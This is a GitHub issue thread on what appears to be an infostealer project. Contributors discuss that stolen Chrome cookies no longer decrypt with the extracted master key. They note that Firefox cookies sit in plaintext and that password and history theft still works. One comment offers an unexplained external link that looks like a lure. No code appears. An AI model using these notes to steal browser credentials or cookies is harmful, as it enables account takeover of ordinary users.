### ISSUE TITLE
Cookies are not decryptable using the Master Key anymore.

### ISSUE THREAD

**Issue by Onyz107** [TheCuteOwl/Trap-Stealer#70]
This is a bug that I found in all the stealers available on the market right now, after some debugging I found out that all the stealers extract the master key and then try to decrypt the cookies using the master key, but that seems to be patched.

For some reason when you try to decrypt the cookies using the Master Key now it now gives you a MAC error (which means that the key for decryption is incorrect).

Seems like chrome and chromium based browsers changed the way they encrypt their cookies.

For firefox though, firefox does not encrypt their cookies at all so they are stored in the database in plaintext ready to be extracted.

Password and history stealing still working though.

EDIT: check [this](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html) and [this](https://thehackernews.com/2024/08/google-chrome-adds-app-bound-encryption.html) for more information

**Comment by ahmedra13579** [comment]
maybe this solution will solve your problem [link](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by TheCuteOwl** [comment]
Hi, sorry I stopped coding it, it bored me too much, I'll just hope someone will do pull requests, or do a fork of my project
